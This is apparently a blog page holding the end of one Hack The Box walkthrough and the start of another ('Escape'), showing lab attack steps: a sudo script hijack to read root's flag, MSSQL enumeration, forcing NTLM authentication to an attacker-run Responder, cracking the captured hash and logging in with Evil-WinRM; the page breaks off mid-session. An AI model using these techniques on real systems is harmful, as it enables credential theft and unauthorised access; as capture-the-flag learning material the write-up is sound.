-bash-5.1$ git status
fatal: not a git repository (or any of the parent directories): .git
-bash-5.1$ ls -la .git
ls: cannot open directory '.git': Permission denied

The git repository route is to be abandoned; the script file remains.

-bash-5.1$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[=] Docker conteainers
{
  "/gitea": "running"
}
{
  "/mysql_db": "running"
}

[=] Docker port mappings
{
  "22/tcp": [
    {
      "HostIp": "127.0.0.1",
      "HostPort": "222"
    }
  ],
  "3000/tcp": [
    {
      "HostIp": "127.0.0.1",
      "HostPort": "3000"
    }
  ]
}

[=] Apache webhosts
[+] searcher.htb is up
[+] gitea.searcher.htb is up

[=] PM2 processes
┌─────┬────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id  │ name   │ namespace   │ version │ mode    │ pid      │ uptime │ ↺    │ status    │ cpu      │ mem      │ user     │ watching │
├─────┼────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0   │ app    │ default     │ N/A     │ fork    │ 1655     │ 28h    │ 0    │ online    │ 0%       │ 31.0mb   │ svc      │ disabled │
└─────┴────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘

[+] Done!

Oh oh… the command that didn’t work before now seems to execute correctly, so it runs a script with that name contained in the folder you are in!

-bash-5.1$ echo -e '#!/bin/bashncat /root/root.txt' > full-checkup.sh && chmod +x full-checkup.sh && sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
d24d04fb75637b25c945648390008608

[+] Done!

And after a few simple tries, we have our root flag!

That’s all folks, as usual, see you at the next BOX, have an excellent hacking (in legal), bye.

Secjuice – Read More

HTB Escape Walkthrough

March 17, 2025/in General News

A very particular windows machine, in which I got stuck, stubbornly looking for an exploit which later turned out to be a simple clue left in plain sight that allowed a very trivial privesc. More challenging, but almost standard, the second privec which then led me to the desired root flag.

Let’s start with the nmap scan.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:03 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-13 05:03:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-11T20:10:28
|_Not valid after:  2053-03-11T20:10:28
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m17s, deviation: 0s, median: 7h59m17s
| smb2-time: 
|   date: 2023-03-13T05:03:45
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds

As usual, there are an infinite number of ports open on a windows machine and not happy, let’s also take a look at the UDP ports.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox]
└─$ sudo nmap -sU 10.10.11.202
[sudo] password for in7rud3r: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:13 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 290.76 seconds

Little steal, thank goodness! Ok, let’s analyze one port at a time!

53 – DNS, 88 – kerberos, 135, 593 – RPC, 139, 445 – SMB, 464

Nothing about this set, unless I’ve missed something.

139, 445 – SMB

The enum4linux tool doesn’t enumerate anything in particular, let’s try a manual approach.
I’m able to connect using the rpcclient tool (rpcclient -U “” -N 10.10.11.202), but investigating this would take too much time, I’ll mark it as an activity to come back to if I can’t find anything else and move on.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient -L //10.10.11.202 
Password for [WORKGROUPin7rud3r]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The SAMBA client shows, among the classic windows shares, a “Public” folder that could be interesting, let’s take a look.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient --no-pass \\10.10.11.202\Public
Try "help" to get a list of possible commands.
smb: > dir
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1428481 blocks available
smb: > get "SQL Server Procedures.pdf"
getting file SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)

Give a look at the pdf file.

Well, a good domain to insert into my /etc/hosts; go ahead.

389 (636, 3268, 3269) – LDAP

As for LDAP, I tried to navigate the structure using phpLDAPAdmin as usual, but without success.

1433 – SQL Server

And for the uninitiated, port 1433 is the one reserved for SQL Server. There will be a lot of work here; let’s work.

The Metasploit Framework is full of attacks for SQL Server… and I think I’ve tried a lot of them.

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > use admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Running MS SQL Server Enumeration...
[*] 10.10.11.202:1433 - Version:
[*]     Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
[*]             Sep 24 2019 13:48:23 
[*]             Copyright (C) 2019 Microsoft Corporation
[*]             Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.10.11.202:1433 - Configuration Parameters:
[*] 10.10.11.202:1433 -         C2 Audit Mode is Not Enabled
[...]
[*] 10.10.11.202:1433 -         sp_getbindtoken
[*] 10.10.11.202:1433 -         sp_replincrementlsn
[*] 10.10.11.202:1433 - Instances found on this server:
[*] 10.10.11.202:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.10.11.202:1433 -         xp_regread might be disabled in this system
[*] Auxiliary module execution completed

msf6 auxiliary(admin/mssql/mssql_enum) > use admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              10000            yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - SQL Server Name: DC
[...][
[+] 10.10.11.202:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.10.11.202:1433 - Query results have been saved to: /home/in7rud3r/.msf4/loot/20230313173523_default_10.10.11.202_mssql.domain.acc_775956.txt
[*] Auxiliary module execution completed

msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > use admin/mssql/mssql_enum_sql_logins
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > options

Module options (auxiliary/admin/mssql/mssql_enum_sql_logins):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              300              yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[...]
[*] 10.10.11.202:1433 -  - PublicUser
[*] 10.10.11.202:1433 -  - sa
[*] 10.10.11.202:1433 -  - sequelAdministrator
[*] Auxiliary module execution completed

I omitted some of the exploits I ran and also omitted some sections of the information returned by the scans, so as not to take up too much reading time.

But let’s connect to the SQL Server instance and investigate the contents of the DBs.

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DCSQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> select @@version
                                                                                                                                                                                                                                                                  

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
                                          

SQL> SELECT name, database_id, create_date FROM sys.databases; 
name                                                                                                                               database_id   create_date   

--------------------------------------------------------------------------------------------------------------------------------   -----------   -----------   

master                                                                                                                                       1   2003-04-08 09:13:36   

tempdb                                                                                                                                       2   2023-03-13 09:35:39   

model                                                                                                                                        3   2003-04-08 09:13:36   

msdb                                                                                                                                         4   2019-09-24 14:21:42   

SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE   

--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------   

master                                                                                                                             dbo                                                                                                                                spt_fallback_db                                                                                                                    b'BASE TABLE'   

master                                                                                                                             dbo                                                                                                                                spt_fallback_dev                                                                                                                   b'BASE TABLE'   

master                                                                                                                             dbo                                                                                                                                spt_fallback_usg                                                                                                                   b'BASE TABLE'   

master                                                                                                                             dbo                                                                                                                                spt_values                                                                                                                         b'VIEW'      

master                                                                                                                             dbo                                                                                                                                spt_monitor                                                                                                                        b'BASE TABLE'   

SQL> use tempdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: tempdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'tempdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE   

--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------   

SQL> use model
[-] ERROR(DCSQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL> use msdb
[*] ENVCHANGE(DATABASE): Old Value: tempdb, New Value: msdb
[*] INFO(DCSQLMOCK): Line 1: Changed database context to 'msdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE   

--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_category_subscriptions                                                                                            b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_system_health_state                                                                                                      b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_execution_history                                                                                                 b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_execution_history_details                                                                                         b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_configuration                                                                                                            b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_conditions                                                                                                               b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_categories                                                                                                        b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                sysdac_instances                                                                                                                   b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_object_sets                                                                                                              b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                dm_hadr_automatic_seeding_history                                                                                                  b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policies                                                                                                                 b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                backupmediaset                                                                                                                     b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                backupmediafamily                                                                                                                  b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                backupset                                                                                                                          b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                autoadmin_backup_configuration_summary                                                                                             b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                backupfile                                                                                                                         b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_target_sets                                                                                                              b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                restorehistory                                                                                                                     b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                restorefile                                                                                                                        b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_target_set_levels                                                                                                        b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                restorefilegroup                                                                                                                   b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                logmarkhistory                                                                                                                     b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                suspect_pages                                                                                                                      b'BASE TABLE'   

SQL>

Besides the SQL Server version which may come in handy to identify some specific exploit, the DB doesn’t seem to contain many schemas and tables. I tried some exciting system queries, but most of them gave “permission denied“. I, therefore, rely on the now official guide for identifying vulnerabilities.

Inside the guide, we find an interesting attack, which is worth trying.

The concept behind this attack is to force the SQL Server to authenticate to a fake server that will capture the unsuspecting service’s credentials.

So, activate our responder…

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo responder -I tun0
[sudo] password for in7rud3r: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.111]
    Responder IPv6             [dead:beef:2::106d]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-IM2J35A52MX]
    Responder Domain Name      [GFB0.LOCAL]
    Responder DCE-RPC Port     [47501]

[+] Listening for events...

…let’s take advantage of one of the Metasploit Framework exploits…

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ msfconsole       
                                                  
 ______________________________________
/ it looks like you're trying to run a                                                                                                                                                                  
 module                               /                                                                                                                                                                 
 --------------------------------------                                                                                                                                                                  
                                                                                                                                                                                                        
                                                                                                                                                                                                        
     __                                                                                                                                                                                                  
    /                                                                                                                                                                                                   
    |  |                                                                                                                                                                                                 
    @  @                                                                                                                                                                                                 
    |  |                                                                                                                                                                                                 
    || |/                                                                                                                                                                                                
    || ||                                                                                                                                                                                                
    |_/|                                                                                                                                                                                                
    ___/                                                                                                                                                                                                
                                                                                                                                                                                                         

       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use help <command> to learn more 
about any command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > options

Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   SMBPROXY             0.0.0.0          yes       IP of SMB proxy or sniffer.
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set smbproxy 10.10.14.111
smbproxy => 10.10.14.111
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > exploit

[*] 10.10.11.202:1433     - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433     - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.111 via xp_dirtree...
[+] 10.10.11.202:1433     - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433     - Go check your SMB relay or capture module for goodies!
[*] sequel.htb:1433       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

…and wait for the attacked service to fall into the trap.

[...]
[+] Listening for events...                                                                                                                                                                              

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequelsql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000

We now have a NetNTLM hash that we can safely hashcat after identifying the corresponding value of the specific hash (5600).

example_hashes [hashcat wiki]

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ cat NTLMv2-SSP.hash 
sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ hashcat -m 5600 NTLMv2-SSP.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

/sys/class/hwmon/hwmon4/temp1_input: No such file or directory

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1410/2885 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba2e60b95a70d405:0101000000000000801d5dfa205ad901072d8534397365f50000000002000800470046004200300001001e00570049004e002d0049004d0032004a00330035004100350032004d00580004003400570049004e002d0049004d0032004a00330035004100350032004d0058002e0047004600420030002e004c004f00430041004c000300140047004600420030002e004c004f00430041004c000500140047004600420030002e004c004f00430041004c0007000800801d5dfa205ad90106000400020000000800300030000000000000000000000000300000df8773489e613e8360eb2d86bf5c2d8e833bd6f0cefe259881a1240933e805980a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000:REGGIE1234ronnie
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba...000000
Time.Started.....: Sun Mar 19 05:29:14 2023 (30 secs)
Time.Estimated...: Sun Mar 19 05:29:44 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   395.6 kH/s (1.09ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700288/14344385 (74.60%)
Rejected.........: 0/10700288 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REESY15987
Hardware.Mon.#1..: Util: 91%

Started: Sun Mar 19 05:27:49 2023
Stopped: Sun Mar 19 05:29:46 2023

And after some waiting and patience, the password comes out. What better tool to use than Evil-WinRM?

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:Userssql_svcDocuments> whoami
sequelsql_svc
*Evil-WinRM* PS C:Userssql_svcDocuments> dir /users


    Directory: C:users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
